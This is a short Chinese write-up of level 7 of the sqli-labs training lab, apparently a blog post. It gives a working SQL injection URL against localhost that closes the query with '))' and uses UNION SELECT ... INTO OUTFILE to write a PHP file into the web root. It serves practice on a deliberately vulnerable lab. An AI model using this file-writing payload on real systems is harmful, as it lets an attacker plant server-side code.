当前位置: 首页 > news >正文

SQL注入第7关

存在注入,需要使用单引号闭合

拥有root权限,secure_file_priv值为空,确定路径

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,"<?phpinfo();?>",3 into outfile "D:\\landui\\xp\\phpstudy_pro\\WWW\\aaa.php"--+

得到aaa.php文件,获取到 PHP 环境信息

打开文件aaa.php

得到本关答案,通关

相关文章:

  • DNS主从服务器
  • 【第K小数——可持久化权值线段树】
  • IIS 服务器日志和性能监控
  • 蓝桥杯嵌入式赛道复习笔记2(按键控制LED灯,双击按键,单击按键,长按按键)
  • element-plus中Popconfirm气泡确认框组件的使用
  • 基于 Docker 和 Flask 构建高并发微服务架构
  • UnitTest框架管理测试用例——python自动化测试
  • Golang学习笔记_49——解释器模式
  • mysql-查看binlog日志
  • 基于SpringBoot+Vue的幼儿园管理系统+LW示例参考
  • GPU视频编解码:Jetson VPI+multimedia_api视频编解码入门(一)
  • Effective C++ 剖析(条款1~9)
  • 【软件工程】03_软件需求分析
  • 速通大厂测开
  • 介绍如何使用Python构建引文网络,并计算结构洞指标
  • 深入解析 `SQL_SMALL_RESULT`:MySQL 的“小优化”大作用
  • 【unity实战】用unity封装一个复杂全面且带不同射击模式的飞机大战射击系统
  • Navicat 17.2 正式发布 | AI 助手、支持 Snowflake...超多新功能等你解锁
  • [贪心算法]-最大数(lambda 表达式的补充)
  • 4.JVM-垃圾回收介绍
  • 神十九都带回了哪些实验样品?果蝇等生命类样品已交付科学家
  • 证监会:坚决拥护党中央对王建军进行纪律审查和监察调查的决定
  • 市场监管总局出手整治涉企乱收费,聚焦政府部门及下属单位等领域
  • 启程回家!神十九轨道舱与返回舱成功分离
  • 许峰已任江苏省南京市副市长
  • 打造沪派水乡的“湿意”,上海正在保护营造一批湿地空间